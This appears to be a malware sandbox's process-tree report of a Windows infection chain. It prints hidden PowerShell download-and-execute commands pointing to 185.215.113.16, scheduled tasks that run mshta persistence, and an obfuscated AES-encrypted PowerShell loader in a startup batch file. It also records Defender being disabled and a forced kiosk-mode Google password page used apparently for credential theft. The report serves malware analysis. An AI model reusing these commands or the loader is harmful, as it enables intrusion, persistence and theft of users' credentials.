C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:86⤵PID:4080
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe8c5d46f8,0x7ffe8c5d4708,0x7ffe8c5d47186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:26⤵PID:3456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:36⤵PID:3608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:86⤵PID:5196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:16⤵
- Uses browser remote debugging
PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:16⤵
- Uses browser remote debugging
PID:3368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:16⤵
- Uses browser remote debugging
PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:16⤵
- Uses browser remote debugging
PID:5752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\dtjmy" & exit5⤵PID:2400
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
PID:5128
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 9564⤵
- Program crash
PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085964001\Setup_2024.exe"C:\Users\Admin\AppData\Local\Temp\1085964001\Setup_2024.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Office 2024 Installer\Click To Run.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:3660 -
C:\Program Files (x86)\Office 2024 Installer\setup.exesetup /configure configuration.xml5⤵
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085971101\97509cc0ad.exe"C:\Users\Admin\AppData\Local\Temp\1085971101\97509cc0ad.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn utVFjmaNpjP /tr "mshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:3160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn utVFjmaNpjP /tr "mshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2100
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Q1Lf0yE7T.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Users\Admin\AppData\Local\Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE"C:\Users\Admin\AppData\Local\Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:3392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:4140 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5888
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mgdn1madETo" /tr "mshta \"C:\Temp\Kzqb5sWMO.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5132
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\Kzqb5sWMO.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2064
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5596 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5808 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵PID:3612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 8366⤵
- Program crash
PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵PID:5668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 9686⤵
- Program crash
PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵PID:5240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 9566⤵
- Program crash
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\10007520101\ad3f9fad25.exe"C:\Users\Admin\AppData\Local\Temp\10007520101\ad3f9fad25.exe"5⤵PID:3636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
PID:476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
PID:5412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
PID:4328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:4484
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵PID:4348
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97700662-57e9-4fd6-8069-f23f9c573fe6} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" gpu8⤵PID:484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a4030d-7397-4309-a3b5-9a336600e135} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" socket8⤵PID:3780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1380 -childID 1 -isForBrowser -prefsHandle 3116 -prefMapHandle 3200 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea2ae86c-1ff0-4e15-88a1-12cef2b4a80c} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab8⤵PID:5988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3976 -prefMapHandle 3972 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4309bd88-da3d-4b8f-a9df-63cfb937f184} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab8⤵PID:5132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4856 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4868 -prefMapHandle 4864 -prefsLen 32945 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ee2252a-2c0e-412c-8882-92ff345003e4} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" utility8⤵PID:5712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5348 -prefMapHandle 5380 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb259c6e-bf31-40ad-903a-820f3a935d3d} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab8⤵PID:6024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {04a11fb5-0b8f-4b7e-b7ab-4c5aea1d8366} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab8⤵PID:2276
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5796 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5700 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7fe891d-f965-489c-b6c8-a8e20749bb15} 4348 "\\.\pipe\gecko-crash-server-pipe.4348" tab8⤵PID:5152
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:752 -
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 9804⤵
- Program crash
PID:4720
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086049041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:5560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:5400
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 9684⤵
- Program crash
PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:1448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9684⤵
- Program crash
PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe"3⤵PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe"3⤵PID:5452
-
-
C:\Users\Admin\AppData\Local\Temp\1086055001\dd037fabef.exe"C:\Users\Admin\AppData\Local\Temp\1086055001\dd037fabef.exe"3⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\1086056001\b7425f83d4.exe"C:\Users\Admin\AppData\Local\Temp\1086056001\b7425f83d4.exe"3⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe"3⤵PID:416
-
-
C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"4⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"4⤵PID:5040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 9764⤵
- Program crash
PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086059001\Setup_2024.exe"C:\Users\Admin\AppData\Local\Temp\1086059001\Setup_2024.exe"3⤵PID:5744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Office 2024 Installer\Click To Run.bat" "4⤵PID:232
-
C:\Program Files (x86)\Office 2024 Installer\setup.exesetup /configure configuration.xml5⤵PID:5448
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2260 -ip 22601⤵PID:4132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4772 -ip 47721⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5064
-
